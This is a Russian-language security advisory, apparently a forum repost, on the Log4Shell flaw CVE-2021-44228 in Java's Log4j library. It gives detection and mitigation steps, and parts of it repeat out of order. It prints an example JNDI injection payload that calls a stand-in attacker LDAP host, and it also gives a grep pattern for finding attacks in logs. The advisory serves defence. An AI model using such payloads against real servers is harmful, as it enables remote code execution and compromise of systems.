Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов.
Уязвимость является крайне опасной ввиду следующих причин:
Помимо схемы
Проверить журнал приложения на предмет предпринятых атак можно при помощи
Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath.
>>>
>>>
>>>
>>>
Уязвимость является крайне опасной ввиду следующих причин:
- Чрезвычайно широкое распростронение библиотеки в экосистеме Java
- Крайне простой эксплойт
- Возможность выполнения злоумышленником произвольной команды на сервере
- Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray»)
"${jndi:ldap://hackerownserver.com/resource}"
, при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit.Помимо схемы
jndi:ldap:
возможно использование jndi:rmi:
и jndi:dns:
Как бороться
Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender.Проверить журнал приложения на предмет предпринятых атак можно при помощи
egrep -i -r '\$\{jndi:(ldap[S]?|rmi|dns):/[^\n]+'
Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath.
>>>
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками
Вход или Регистрация
>>>
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками
Вход или Регистрация
>>>
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками
Вход или Регистрация
>>>
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками
Вход или Регистрация
По отдельным проектам
-
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками Вход или РегистрацияСам не подвержен, плагины возможно.
-
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками Вход или Регистрация
-
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками Вход или РегистрацияУязвимость есть, но не может быть использована, поскольку используется Java Security Manager.
-
Вы не можете просматривать ссылку пожалуйста воспользуйтесь следующими ссылками Вход или Регистрация